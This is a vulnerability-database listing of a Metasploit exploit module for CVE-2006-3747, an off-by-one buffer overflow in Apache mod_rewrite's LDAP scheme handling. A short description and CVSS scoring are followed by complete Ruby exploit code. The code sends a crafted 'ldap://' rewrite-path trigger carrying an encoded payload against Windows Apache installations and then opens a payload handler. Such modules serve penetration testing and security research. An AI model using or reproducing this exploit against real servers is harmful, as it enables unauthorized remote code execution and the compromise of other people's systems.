Apache Module mod_rewrite LDAP Protocol Buffer Overflow

2009-03-1006:42:11

aushack <[email protected]>

www.rapid7.com

CVSS2

7.6

Attack Vector

NETWORK

Attack Complexity

HIGH

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:H/Au:N/C:C/I:C/A:C

JSON

This module exploits the mod_rewrite LDAP protocol scheme handling flaw discovered by Mark Dowd, which produces an off-by-one overflow. Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. This module requires REWRITEPATH to be set accurately. In addition, the target must have ‘RewriteEngine on’ configured, with a specific ‘RewriteRule’ condition enabled to allow for exploitation. The flaw affects multiple platforms, however this module currently only supports Windows based installations.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Module mod_rewrite LDAP Protocol Buffer Overflow',
      'Description'    => %q{
        This module exploits the mod_rewrite LDAP protocol scheme handling
        flaw discovered by Mark Dowd, which produces an off-by-one overflow.
        Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
        This module requires REWRITEPATH to be set accurately. In addition,
        the target must have 'RewriteEngine on' configured, with a specific
        'RewriteRule' condition enabled to allow for exploitation.

        The flaw affects multiple platforms, however this module currently
        only supports Windows based installations.
      },
      'Author'         => 'aushack',
      'References'     =>
        [
          [ 'CVE', '2006-3747' ],
          [ 'OSVDB', '27588' ],
          [ 'BID', '19204' ],
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],
          [ 'EDB', '3680' ],
          [ 'EDB', '3996' ],
          [ 'EDB', '2237' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'AllowWin32SEH' => true
        },
      'Privileged'     => true,
      'Platform'       => ['win'],
      'Payload'        =>
        {
          'Space'    => 636,
          'BadChars' => "\x00\x0a\x0d\x20",
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
          'StackAdjustment' => -3500,
          'DisableNops'  =>  'True',
        },
      'Targets'        =>
        [
          [  'Automatic', {} ], # aushack tested OK 20090310 win32
        ],
      'DisclosureDate' => '2006-07-28',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
        ])
  end


  def check
    res = send_request_raw({
      'uri'     => '/',
      'version' => '1.1',
    }, 2)

    if (res.to_s =~ /Apache/) # This could be smarter.
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe

  end

  def exploit

    # On Linux Apache, it is possible to overwrite EIP by
    # sending ldap://<buf> ... TODO aushack

    trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'

    print_status("Sending payload.")
    send_request_raw({
        'uri'     => normalize_uri(datastore['REWRITEPATH']) + trigger + payload.encoded,
        'version' => '1.0',
        }, 2)
    handler
  end
end